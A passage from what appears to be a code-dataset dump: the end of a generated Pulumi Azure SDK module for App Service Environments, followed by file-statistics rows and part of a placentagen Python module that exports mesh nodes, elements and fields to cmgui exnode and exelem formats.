virtual_network_name=example_virtual_network.name,
address_prefixes=["10.0.2.0/24"])
example_environment = azure.appservice.Environment("exampleEnvironment",
subnet_id=ase.id,
pricing_tier="I2",
front_end_scale_factor=10,
internal_load_balancing_mode="Web, Publishing",
allowed_user_ip_cidrs=[
"11.22.33.44/32",
"55.66.77.0/24",
],
cluster_settings=[azure.appservice.EnvironmentClusterSettingArgs(
name="DisableTls1.0",
value="1",
)])
```
## Import
The App Service Environment can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:appservice/environment:Environment myAppServiceEnv /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/myResourceGroup/providers/Microsoft.Web/hostingEnvironments/myAppServiceEnv
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_user_ip_cidrs: Allowed user added IP ranges on the ASE database. Use the addresses you want to set as the explicit egress address ranges.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentClusterSettingArgs']]]] cluster_settings: Zero or more `cluster_setting` blocks as defined below.
:param pulumi.Input[int] front_end_scale_factor: Scale factor for front end instances. Possible values are between `5` and `15`. Defaults to `15`.
:param pulumi.Input[str] internal_load_balancing_mode: Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None`, `Web`, `Publishing` and combined value `"Web, Publishing"`. Defaults to `None`.
:param pulumi.Input[str] name: The name of the App Service Environment. Changing this forces a new resource to be created.
:param pulumi.Input[str] pricing_tier: Pricing tier for the front end instances. Possible values are `I1`, `I2` and `I3`. Defaults to `I1`.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
:param pulumi.Input[str] subnet_id: The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: EnvironmentArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an App Service Environment.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_virtual_network = azure.network.VirtualNetwork("exampleVirtualNetwork",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
address_spaces=["10.0.0.0/16"])
ase = azure.network.Subnet("ase",
resource_group_name=example_resource_group.name,
virtual_network_name=example_virtual_network.name,
address_prefixes=["10.0.1.0/24"])
gateway = azure.network.Subnet("gateway",
resource_group_name=example_resource_group.name,
virtual_network_name=example_virtual_network.name,
address_prefixes=["10.0.2.0/24"])
example_environment = azure.appservice.Environment("exampleEnvironment",
subnet_id=ase.id,
pricing_tier="I2",
front_end_scale_factor=10,
internal_load_balancing_mode="Web, Publishing",
allowed_user_ip_cidrs=[
"11.22.33.44/32",
"55.66.77.0/24",
],
cluster_settings=[azure.appservice.EnvironmentClusterSettingArgs(
name="DisableTls1.0",
value="1",
)])
```
## Import
The App Service Environment can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:appservice/environment:Environment myAppServiceEnv /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/myResourceGroup/providers/Microsoft.Web/hostingEnvironments/myAppServiceEnv
```
:param str resource_name: The name of the resource.
:param EnvironmentArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(EnvironmentArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
allowed_user_ip_cidrs: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
cluster_settings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentClusterSettingArgs']]]]] = None,
front_end_scale_factor: Optional[pulumi.Input[int]] = None,
internal_load_balancing_mode: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
pricing_tier: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
user_whitelisted_ip_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = EnvironmentArgs.__new__(EnvironmentArgs)
__props__.__dict__["allowed_user_ip_cidrs"] = allowed_user_ip_cidrs
__props__.__dict__["cluster_settings"] = cluster_settings
__props__.__dict__["front_end_scale_factor"] = front_end_scale_factor
__props__.__dict__["internal_load_balancing_mode"] = internal_load_balancing_mode
__props__.__dict__["name"] = name
__props__.__dict__["pricing_tier"] = pricing_tier
__props__.__dict__["resource_group_name"] = resource_group_name
if subnet_id is None and not opts.urn:
raise TypeError("Missing required property 'subnet_id'")
__props__.__dict__["subnet_id"] = subnet_id
__props__.__dict__["tags"] = tags
if user_whitelisted_ip_ranges is not None and not opts.urn:
warnings.warn("""this property has been renamed to `allowed_user_ip_cidrs` better reflect the expected ip range format""", DeprecationWarning)
pulumi.log.warn("""user_whitelisted_ip_ranges is deprecated: this property has been renamed to `allowed_user_ip_cidrs` better reflect the expected ip range format""")
__props__.__dict__["user_whitelisted_ip_ranges"] = user_whitelisted_ip_ranges
__props__.__dict__["internal_ip_address"] = None
__props__.__dict__["location"] = None
__props__.__dict__["outbound_ip_addresses"] = None
__props__.__dict__["service_ip_address"] = None
super(Environment, __self__).__init__(
'azure:appservice/environment:Environment',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
allowed_user_ip_cidrs: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
cluster_settings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentClusterSettingArgs']]]]] = None,
front_end_scale_factor: Optional[pulumi.Input[int]] = None,
internal_ip_address: Optional[pulumi.Input[str]] = None,
internal_load_balancing_mode: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
outbound_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
pricing_tier: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
service_ip_address: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
user_whitelisted_ip_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'Environment':
"""
Get an existing Environment resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_user_ip_cidrs: Allowed user added IP ranges on the ASE database. Use the addresses you want to set as the explicit egress address ranges.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EnvironmentClusterSettingArgs']]]] cluster_settings: Zero or more `cluster_setting` blocks as defined below.
:param pulumi.Input[int] front_end_scale_factor: Scale factor for front end instances. Possible values are between `5` and `15`. Defaults to `15`.
:param pulumi.Input[str] internal_ip_address: IP address of internal load balancer of the App Service Environment.
:param pulumi.Input[str] internal_load_balancing_mode: Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None`, `Web`, `Publishing` and combined value `"Web, Publishing"`. Defaults to `None`.
:param pulumi.Input[str] location: The location where the App Service Environment exists.
:param pulumi.Input[str] name: The name of the App Service Environment. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] outbound_ip_addresses: List of outbound IP addresses of the App Service Environment.
:param pulumi.Input[str] pricing_tier: Pricing tier for the front end instances. Possible values are `I1`, `I2` and `I3`. Defaults to `I1`.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
:param pulumi.Input[str] service_ip_address: IP address of service endpoint of the App Service Environment.
:param pulumi.Input[str] subnet_id: The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _EnvironmentState.__new__(_EnvironmentState)
__props__.__dict__["allowed_user_ip_cidrs"] = allowed_user_ip_cidrs
__props__.__dict__["cluster_settings"] = cluster_settings
__props__.__dict__["front_end_scale_factor"] = front_end_scale_factor
__props__.__dict__["internal_ip_address"] = internal_ip_address
__props__.__dict__["internal_load_balancing_mode"] = internal_load_balancing_mode
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["outbound_ip_addresses"] = outbound_ip_addresses
__props__.__dict__["pricing_tier"] = pricing_tier
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["service_ip_address"] = service_ip_address
__props__.__dict__["subnet_id"] = subnet_id
__props__.__dict__["tags"] = tags
__props__.__dict__["user_whitelisted_ip_ranges"] = user_whitelisted_ip_ranges
return Environment(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="allowedUserIpCidrs")
def allowed_user_ip_cidrs(self) -> pulumi.Output[Sequence[str]]:
"""
Allowed user added IP ranges on the ASE database. Use the addresses you want to set as the explicit egress address ranges.
"""
return pulumi.get(self, "allowed_user_ip_cidrs")
@property
@pulumi.getter(name="clusterSettings")
def cluster_settings(self) -> pulumi.Output[Sequence['outputs.EnvironmentClusterSetting']]:
"""
Zero or more `cluster_setting` blocks as defined below.
"""
return pulumi.get(self, "cluster_settings")
@property
@pulumi.getter(name="frontEndScaleFactor")
def front_end_scale_factor(self) -> pulumi.Output[Optional[int]]:
"""
Scale factor for front end instances. Possible values are between `5` and `15`. Defaults to `15`.
"""
return pulumi.get(self, "front_end_scale_factor")
@property
@pulumi.getter(name="internalIpAddress")
def internal_ip_address(self) -> pulumi.Output[str]:
"""
IP address of internal load balancer of the App Service Environment.
"""
return pulumi.get(self, "internal_ip_address")
@property
@pulumi.getter(name="internalLoadBalancingMode")
def internal_load_balancing_mode(self) -> pulumi.Output[Optional[str]]:
"""
Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None`, `Web`, `Publishing` and combined value `"Web, Publishing"`. Defaults to `None`.
"""
return pulumi.get(self, "internal_load_balancing_mode")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
The location where the App Service Environment exists.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the App Service Environment. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="outboundIpAddresses")
def outbound_ip_addresses(self) -> pulumi.Output[Sequence[str]]:
"""
List of outbound IP addresses of the App Service Environment.
"""
return pulumi.get(self, "outbound_ip_addresses")
@property
@pulumi.getter(name="pricingTier")
def pricing_tier(self) -> pulumi.Output[Optional[str]]:
"""
Pricing tier for the front end instances. Possible values are `I1`, `I2` and `I3`. Defaults to `I1`.
"""
return pulumi.get(self, "pricing_tier")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="serviceIpAddress")
def service_ip_address(self) -> pulumi.Output[str]:
"""
IP address of service endpoint of the App Service Environment.
"""
return pulumi.get(self, "service_ip_address")
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> pulumi.Output[str]:
"""
The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="userWhitelistedIpRanges")
def user_whitelisted_ip_ranges(self) -> pulumi.Output[Sequence[str]]:
return pulumi.get(self, "user_whitelisted_ip_ranges")
| 53.201044
| 272
| 0.682519
| 5,027
| 40,752
| 5.290233
| 0.053909
| 0.086034
| 0.066331
| 0.044672
| 0.927841
| 0.911672
| 0.89915
| 0.888697
| 0.880838
| 0.869031
| 0
| 0.006907
| 0.218345
| 40,752
| 765
| 273
| 53.270588
| 0.827965
| 0.361626
| 0
| 0.772834
| 1
| 0
| 0.151675
| 0.070275
| 0
| 0
| 0
| 0
| 0
| 1
| 0.161593
| false
| 0.002342
| 0.016393
| 0.007026
| 0.276347
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d497575f2404b78e5fde26a84c95325498aeb250
| 41,007
|
py
|
Python
|
source/placentagen/imports_and_exports.py
|
VirtualPregnancy/placentagen
|
08c0731a6cf21a451384450e355254492f8d43b1
|
[
"Apache-2.0"
] | 2
|
2019-06-11T21:35:54.000Z
|
2022-03-10T01:53:43.000Z
|
source/placentagen/imports_and_exports.py
|
alysclark/placentagen
|
bccae1eb73b760a358ea991be27de5c15c2420b6
|
[
"Apache-2.0"
] | 31
|
2018-03-14T01:43:19.000Z
|
2020-07-23T21:23:27.000Z
|
source/placentagen/imports_and_exports.py
|
VirtualPregnancy/placentagen
|
08c0731a6cf21a451384450e355254492f8d43b1
|
[
"Apache-2.0"
] | 6
|
2018-04-29T23:42:48.000Z
|
2021-09-14T01:33:53.000Z
|
#!/usr/bin/env python
import numpy as np
from . import pg_utilities
import warnings
import skimage
from skimage import io
def export_ex_coords(data, groupname, filename, type):
# Exports coordinates to exnode or exdata format
# data = array of data
# groupname = what you want your data to be called in cmgui
# filename = file name without extension
# type = exnode or exdata
print('filename', filename)
data_length = len(
data[0]) # if this is 3 then number nodes or data automatically if 4 then node numbers are given as
# first entry
data_num = len(data)
filename = filename + '.' + type
f = open(filename, 'w')
f.write(" Group name: %s\n" % groupname)
f.write(" #Fields=1\n")
f.write(" 1) coordinates, coordinate, rectangular cartesian, #Components=3\n")
f.write(" x. Value index=1, #Derivatives=0\n")
f.write(" y. Value index=1, #Derivatives=0\n")
f.write(" z. Value index=1, #Derivatives=0\n")
for x in range(0, data_num):
if data_length == 4:
f.write("Node: " "%s\n" % int(data[x][0] + 1))
f.write(" %s\n" % (data[x][1]))
f.write(" %s\n" % (data[x][2]))
f.write(" %s\n" % (data[x][3]))
else:
f.write("Node: " "%s\n" % (x + 1))
f.write(" %s\n" % data[x][0])
f.write(" %s\n" % data[x][1])
f.write(" %s\n" % data[x][2])
f.close()
def export_ex_field(data, groupname, fieldname, filename, type):
# Exports field to exnode or exdata format
# data = array of data
# groupname = what you want your data to be called in cmgui
# filename = file name without extension
# type = exnode or exdata
# first entry
data_num = len(data)
filename = filename + '.' + type
f = open(filename, 'w')
f.write(" Group name: %s\n" % groupname)
f.write(" #Fields=1\n")
f.write(" 1) %s, coordinate, rectangular cartesian, #Components=1\n" % fieldname)
f.write(" %s. Value index=1, #Derivatives=0\n" % fieldname)
for x in range(0, data_num):
f.write("Node: " "%s\n" % (x + 1))
f.write(" %s\n" % data[x])
f.close()
def export_nodal_rad_field(data, groupname, fieldname, filename, type, nodes, elems):
# Exports coordinates to exnode or exdata format
# data = array of data
# groupname = what you want your data to be called in cmgui
# filename = file name without extension
# type = exnode or exdata
# first entry
data_num = len(data)
filename = filename + '.' + type
f = open(filename, 'w')
f.write(" Group name: %s\n" % groupname)
f.write(" #Fields=1\n")
f.write(" 1) %s, coordinate, rectangular cartesian, #Components=1\n" % fieldname)
f.write(" %s. Value index=1, #Derivatives=0\n" % fieldname)
num_per_node = np.zeros(len(nodes))
node_rad = np.zeros(len(nodes))
for x in range(0, data_num):
np1 = elems[x][1]
np2 = elems[x][2]
num_per_node[np1] = num_per_node[np1] + 1.
num_per_node[np2] = num_per_node[np2] + 1.
node_rad[np1] = node_rad[np1] + data[x]
node_rad[np2] = node_rad[np2] + data[x]
for y in range(0, len(nodes)):
node_rad[y] = node_rad[y] / num_per_node[y]
f.write("Node: " "%s\n" % (y + 1))
f.write(" %s\n" % (node_rad[y]))
f.close()
def export_exelem_1d(data, groupname, filename):
# Exports element locations to exelem format
# data = array of data
# groupname = what you want your data to be called in cmgui
# filename = file name without extension
data_num = len(data)
filename = filename + '.exelem'
f = open(filename, 'w')
f.write(" Group name: %s\n" % groupname)
f.write(" Shape. Dimension=1\n")
f.write(" #Scale factor sets= 1\n")
f.write(" l.Lagrange, #Scale factors= 2\n")
f.write(" #Nodes= 2\n")
f.write(" #Fields=1\n")
f.write(" 1) coordinates, coordinate, rectangular cartesian, #Components=3\n")
f.write(" x. l.Lagrange, no modify, standard node based.\n")
f.write(" #Nodes= 2\n")
f.write(" 1. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 1\n")
f.write(" 2. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 2\n")
f.write(" y. l.Lagrange, no modify, standard node based.\n")
f.write(" #Nodes= 2\n")
f.write(" 1. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 1\n")
f.write(" 2. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 2\n")
f.write(" z. l.Lagrange, no modify, standard node based.\n")
f.write(" #Nodes= 2\n")
f.write(" 1. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 1\n")
f.write(" 2. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 2\n")
for x in range(0, data_num):
f.write(" Element: %s 0 0\n" % int(data[x][0] + 1))
f.write(" Nodes:\n")
f.write(" %s %s\n" % (int(data[x][1] + 1), int(data[x][2] + 1)))
f.write(" Scale factors:\n")
f.write(" 0.1000000000000000E+01 0.1000000000000000E+01\n")
f.close()
def export_exelem_3d_linear(data, groupname, filename):
# Exports element locations to exelem format
# data = array of data
# groupname = what you want your data to be called in cmgui
# filename = file name without extension
data_num = len(data)
filename = filename + '.exelem'
f = open(filename, 'w')
f.write(" Group name: %s\n" % groupname)
f.write(" Shape. Dimension=3 line*line*line\n")
f.write(" #Scale factor sets= 0\n")
f.write(" #Nodes= 8\n")
f.write(" #Fields=1\n")
f.write(" 1) coordinates, coordinate, rectangular cartesian, #Components=3\n")
f.write(" x. l.Lagrange*l.Lagrange*l.Lagrange, no modify, standard node based.\n")
f.write(" #Nodes= 8\n")
f.write(" 1. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 2. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 3. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 4. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 5. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 6. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 7. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 8. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" y. l.Lagrange*l.Lagrange*l.Lagrange, no modify, standard node based.\n")
f.write(" #Nodes= 8\n")
f.write(" 1. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 2. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 3. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 4. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 5. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 6. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 7. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 8. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" z. l.Lagrange*l.Lagrange*l.Lagrange, no modify, standard node based.\n")
f.write(" #Nodes= 8\n")
f.write(" 1. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 2. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 3. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 4. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 5. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 6. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 7. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 8. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
for x in range(0, data_num):
f.write(" Element: %s 0 0\n" % int(data[x][0] + 1))
f.write(" Nodes:")
f.write(
" %s %s %s %s %s %s %s %s\n" % (
int(data[x][1] + 1), int(data[x][2] + 1), int(data[x][3] + 1), int(data[x][4] + 1), int(data[x][5] + 1),
int(data[x][6] + 1), int(data[x][7] + 1), int(data[x][8] + 1)))
f.close()
def export_exelem_3d_linear_list(data, list, groupname, filename):
# Exports element locations to exelem format
# data = array of data
# groupname = what you want your data to be called in cmgui
# filename = file name without extension
data_num = len(list)
filename = filename + '.exelem'
f = open(filename, 'w')
f.write(" Group name: %s\n" % groupname)
f.write(" Shape. Dimension=3 line*line*line\n")
f.write(" #Scale factor sets= 0\n")
f.write(" #Nodes= 8\n")
f.write(" #Fields=1\n")
f.write(" 1) coordinates, coordinate, rectangular cartesian, #Components=3\n")
f.write(" x. l.Lagrange*l.Lagrange*l.Lagrange, no modify, standard node based.\n")
f.write(" #Nodes= 8\n")
f.write(" 1. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 2. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 3. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 4. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 5. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 6. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 7. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 8. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" y. l.Lagrange*l.Lagrange*l.Lagrange, no modify, standard node based.\n")
f.write(" #Nodes= 8\n")
f.write(" 1. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 2. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 3. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 4. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 5. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 6. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 7. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 8. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" z. l.Lagrange*l.Lagrange*l.Lagrange, no modify, standard node based.\n")
f.write(" #Nodes= 8\n")
f.write(" 1. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 2. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 3. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 4. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 5. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 6. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 7. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
f.write(" 8. #Values=1\n")
f.write(" Value indices: 1\n")
f.write(" Scale factor indices: 0\n")
for x in range(0, data_num):
y = list[x]
f.write(" Element: %s 0 0\n" % int(data[x][0] + 1))
f.write(" Nodes:")
f.write(
" %s %s %s %s %s %s %s %s\n" % (
int(data[y][1] + 1), int(data[y][2] + 1), int(data[y][3] + 1), int(data[y][4] + 1),
int(data[y][5] + 1),
int(data[y][6] + 1), int(data[y][7] + 1), int(data[y][8] + 1)))
f.close()
def export_exfield_3d_linear(data, groupname, fieldname, filename):
# Exports element fields to exelem format
# data = array of data
# groupname = what you want your data to be called in cmgui
# filename = file name without extension
data_num = len(data)
filename = filename + '.exelem'
f = open(filename, 'w')
f.write(" Group name: %s\n" % groupname)
f.write(" Shape. Dimension=3 line*line*line\n")
f.write(" #Scale factor sets= 0\n")
f.write(" #Nodes= 0\n")
f.write(" #Fields=1\n")
f.write(" 1) %s, field, rectangular cartesian, #Components=1\n" % fieldname)
f.write(" %s. l.Lagrange*l.Lagrange*l.Lagrange, no modify, grid based.\n" % fieldname)
f.write(" #xi1=1 \n")
f.write(" #xi2=1 \n")
f.write(" #xi3=1 \n")
for x in range(0, data_num):
f.write(" Element: %s 0 0\n" % int(x + 1))
f.write(" Values:\n")
f.write(
" %s %s %s %s %s %s %s %s\n" % (
data[x], data[x], data[x], data[x], data[x], data[x], data[x], data[x]))
f.close()
def export_exfield_3d_linear_list(data, list, groupname, fieldname, filename):
# Exports element fields to exelem format when data is defined at a specified list of nodes
# data = array of data
# groupname = what you want your data to be called in cmgui
# filename = file name without extension
data_num = len(list)
filename = filename + '.exelem'
f = open(filename, 'w')
f.write(" Group name: %s\n" % groupname)
f.write(" Shape. Dimension=3 line*line*line\n")
f.write(" #Scale factor sets= 0\n")
f.write(" #Nodes= 0\n")
f.write(" #Fields=1\n")
f.write(" 1) %s, field, rectangular cartesian, #Components=1\n" % fieldname)
f.write(" %s. l.Lagrange*l.Lagrange*l.Lagrange, no modify, grid based.\n" % fieldname)
f.write(" #xi1=1 \n")
f.write(" #xi2=1 \n")
f.write(" #xi3=1 \n")
for x in range(0, data_num):
exp_data = data[list[x]]
f.write(" Element: %s 0 0\n" % int(x + 1))
f.write(" Values:\n")
f.write(
" %s %s %s %s %s %s %s %s\n" % (
exp_data, exp_data, exp_data, exp_data, exp_data, exp_data, exp_data, exp_data))
f.close()
def export_exfield_1d_linear(data, groupname, fieldname, filename):
# Exports element locations to exelem format
# data = array of data
# groupname = what you want your data to be called in cmgui
# filename = file name without extension
data_num = len(data)
filename = filename + '.exelem'
f = open(filename, 'w')
f.write(" Group name: %s\n" % groupname)
f.write(" Shape. Dimension=1\n")
f.write(" #Scale factor sets= 0\n")
f.write(" #Nodes= 0\n")
f.write(" #Fields=1\n")
f.write(" 1) %s, field, rectangular cartesian, #Components=1\n" % fieldname)
f.write(" %s. l.Lagrange, no modify, grid based.\n" % fieldname)
f.write(" #xi1=1 \n")
for x in range(0, data_num):
f.write(" Element: %s 0 0\n" % int(x + 1))
f.write(" Values:\n")
f.write(
" %s %s\n" % (
data[x], data[x]))
f.close()
######
# Function: takes data from the csv and converts it to arrays
# Inputs: data_file - generated from the panadas read_csv function, containing results from imageJ image analysis
# Arrays - a group of arrays each with length N for their first axis
# Outputs: nodes - an M x 3 array giving cartesian coordinates (x,y,z) for the node locations in the tree
# elems - an N x 3 array, the first colum in the element number, the second two columns are the index of the start and end node
# radii, length, euclidean_length - there are all an N x 1 array containing a property for each element
######
def import_imagej_skel_csv(data_file, keep_skeleton, what_skel):
# If keep_skeleton = 0 we keep all the elements in the skeleton
# Otherwise we can select one out from the dataset to analyse
if what_skel == "less": # implies we want <= value
data_file = data_file[data_file.SkeletonID <= keep_skeleton]
elif what_skel == "single":
data_file = data_file[data_file.SkeletonID == keep_skeleton]
elif what_skel == "all":
print("reading all skeletons: could take a while")
else:
